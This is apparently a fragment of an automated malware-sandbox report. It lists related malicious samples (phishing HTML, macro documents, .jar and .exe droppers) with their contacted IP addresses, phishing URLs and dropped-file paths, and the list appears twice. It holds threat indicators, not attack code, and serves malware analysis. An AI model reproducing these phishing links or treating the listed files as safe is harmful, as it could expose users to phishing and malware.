                  https://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Ft.e.vailresorts.com%2Fr%2F%3Fid%3Dh136d0d7a%2C40a0676%2C40a3cb9%26p1%3Ds0na.blob.core.windows.net%252Fbhu%252FXp2.html%2523YnJldHQud29sbGVuQHZ5YWlyZS5jb20%3D&data=02%7C01%7CGMB-GLB-Phishing%40vyaire.com%7C53dd4ab2e44f427fbf0d08d7cbee0d30%7C67cf4ad46a1a4a019dfeaf94c1adbc07%7C0%7C0%7C637202095592205657&sdata=VajxY34sWJ%2FgjNyjauh9wFBU4qqN8XgEXXAl6c9voGM%3D&reserved=0Get hashmaliciousBrowse
                  • 52.239.232.36
                  F-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • 127.0.0.1
                  DOC Q0017 - 3512C.htmlGet hashmaliciousBrowse
                  • 23.253.181.252
                  CCF202018038477.htmlGet hashmaliciousBrowse
                  • 52.87.111.218
                  job_attach_c9v.jsGet hashmaliciousBrowse
                  • 8.209.72.245
                  http://www.is-two.biz/Get hashmaliciousBrowse
                  • 195.22.26.248
                  xYwmyCik8i.docGet hashmaliciousBrowse
                  • 52.114.6.46
                  AML_Presentation_March_2020_pdf.jarGet hashmaliciousBrowse
                  • 79.143.87.146
                  AML_Presentation_March_2020_pdf.jarGet hashmaliciousBrowse
                  • 79.143.87.146
                  DAWOOENC LNG RFQ PACKAGEDOCUMENTS.exeGet hashmaliciousBrowse
                  • 52.213.114.86
                  COVID 19 Relief.docGet hashmaliciousBrowse
                  • 209.141.54.161
                  https://bjru.us17.list-manage.com/track/click?u=05866771f816c6ee662dd8649&id=501ae5cfeb&e=6668efedceGet hashmaliciousBrowse
                  • 13.224.96.50
                  eCzadGXtGI.exeGet hashmaliciousBrowse
                  • 31.44.184.50
                  VOUCHER Kontik.ppamGet hashmaliciousBrowse
                  • 186.243.111.60
                  VOUCHER Kontik.ppamGet hashmaliciousBrowse
                  • 186.243.111.60
                  Christmass.exeGet hashmaliciousBrowse
                  • 192.168.2.232
                  Doc n#U00b058357_202003186781.xlsGet hashmaliciousBrowse
                  • 47.252.85.163
                  unknownYu4pbQtaWS.docGet hashmaliciousBrowse
                  • 52.114.74.44
                  http://www.is-two.biz/script/ChannelRegister.phpGet hashmaliciousBrowse
                  • 195.22.26.248
                  OGa0dC4QVI.exeGet hashmaliciousBrowse
                  • 198.58.119.85
                  https://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Ft.e.vailresorts.com%2Fr%2F%3Fid%3Dh136d0d7a%2C40a0676%2C40a3cb9%26p1%3Ds0na.blob.core.windows.net%252Fbhu%252FXp2.html%2523YnJldHQud29sbGVuQHZ5YWlyZS5jb20%3D&data=02%7C01%7CGMB-GLB-Phishing%40vyaire.com%7C53dd4ab2e44f427fbf0d08d7cbee0d30%7C67cf4ad46a1a4a019dfeaf94c1adbc07%7C0%7C0%7C637202095592205657&sdata=VajxY34sWJ%2FgjNyjauh9wFBU4qqN8XgEXXAl6c9voGM%3D&reserved=0Get hashmaliciousBrowse
                  • 52.239.232.36
                  F-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                  • 127.0.0.1
                  DOC Q0017 - 3512C.htmlGet hashmaliciousBrowse
                  • 23.253.181.252
                  CCF202018038477.htmlGet hashmaliciousBrowse
                  • 52.87.111.218
                  job_attach_c9v.jsGet hashmaliciousBrowse
                  • 8.209.72.245
                  http://www.is-two.biz/Get hashmaliciousBrowse
                  • 195.22.26.248
                  xYwmyCik8i.docGet hashmaliciousBrowse
                  • 52.114.6.46
                  AML_Presentation_March_2020_pdf.jarGet hashmaliciousBrowse
                  • 79.143.87.146
                  AML_Presentation_March_2020_pdf.jarGet hashmaliciousBrowse
                  • 79.143.87.146
                  DAWOOENC LNG RFQ PACKAGEDOCUMENTS.exeGet hashmaliciousBrowse
                  • 52.213.114.86
                  COVID 19 Relief.docGet hashmaliciousBrowse
                  • 209.141.54.161
                  https://bjru.us17.list-manage.com/track/click?u=05866771f816c6ee662dd8649&id=501ae5cfeb&e=6668efedceGet hashmaliciousBrowse
                  • 13.224.96.50
                  eCzadGXtGI.exeGet hashmaliciousBrowse
                  • 31.44.184.50
                  VOUCHER Kontik.ppamGet hashmaliciousBrowse
                  • 186.243.111.60
                  VOUCHER Kontik.ppamGet hashmaliciousBrowse
                  • 186.243.111.60
                  Christmass.exeGet hashmaliciousBrowse
                  • 192.168.2.232
                  Doc n#U00b058357_202003186781.xlsGet hashmaliciousBrowse
                  • 47.252.85.163

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  C:\Users\user\AppData\Roaming\vbc.exeF-A Payment 20-26 force.xlsxGet hashmaliciousBrowse
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SQEVR752\regasm[1].exeF-A Payment 20-26 force.xlsxGet hashmaliciousBrowse

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.